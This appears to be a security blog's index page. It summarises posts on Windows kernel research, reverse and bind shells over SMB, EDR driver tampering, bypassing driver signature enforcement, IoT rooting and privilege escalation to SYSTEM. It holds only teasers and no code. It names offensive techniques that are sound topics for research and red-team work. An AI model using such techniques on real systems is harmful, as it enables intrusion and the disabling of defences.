Menu

The SuperFetch Query superpower

The SuperFetch Query superpower

In the previous blogpost - Fixing (Windows Internals) Meminfo.exe - we dig into the tool Meminfo.exe from Windows Internals Book highlighting “FileInfo requests”. I suggest you take a look at some details about another type of request named “SuperFetchQuery” which can be useful for some scenarios like Red Team / Privesc, Pentest, Exploit Dev or Maldev. Let’s take a look !


Read more →

Fixing (Windows Internals) Meminfo.exe

Fixing (Windows Internals) Meminfo.exe

A while ago I started to read Windows Internals books. I’ve discovered Meminfo.exe tool that allows to retrieve information about physical & virtual memory.
Some options did not give any output / crash the program, after MemInfo source code analysis and fileinfo.sys driver reversing I found some quick (and dirty) fixes. Maybe it can help if someone encounter the same issues.


Read more →

Fuegoshell : Windows remote shell re-using TCP 445

Fuegoshell : Windows remote shell re-using TCP 445

In this short blogpost we will discuss how named pipes and Powershell oneliners could be used for creating Windows bind / reverse shell using Windows SMB port.


Read more →

EDRSnowblast - blizzard on EDR drivers

EDRSnowblast - blizzard on EDR drivers

After the sandstorm it’s time for the blizzard ! The well-known EDRSandblast tool is a fantastic code base for Windows kernel investigating purpose, after several modification I decided to fork this project and wanted to share details about this with the community.


Read more →

Windows kernel driver static reverse using IDA and GHIDRA

Windows kernel driver static reverse using IDA and GHIDRA

Here are some notes for Windows drivers reverse enginering noob. This topic is already covered and you can find many resources on Internet, here we will use IDA and GHIDRA and observe differences.


Read more →

Loading unsigned Windows drivers without reboot

Loading unsigned Windows drivers without reboot

The previous post exposes how to create a weaponized driver. How can we load this unsigned drivers into the Windows kernel bypassing Driver Signing Enforcement (DSE) ? Here are some details about that.


Read more →

How to get local root shell on the LG HR598 Bluray

How to get local root shell on the LG HR598 Bluray

For a long time I was wondering how to pwn embedded (or IoT) devices. I managed to get a root shell on my old LG HR 598 Bluray player, here is some notes about my hardware hacking journey.


Read more →

Pimp my PID - get SYSTEM using Windows kernel

Pimp my PID - get SYSTEM using Windows kernel

During my journey into the Windows Kernel I found interesting to create a tool to elevate any process to SYSTEM using a driver. Here are some details about that.


Read more →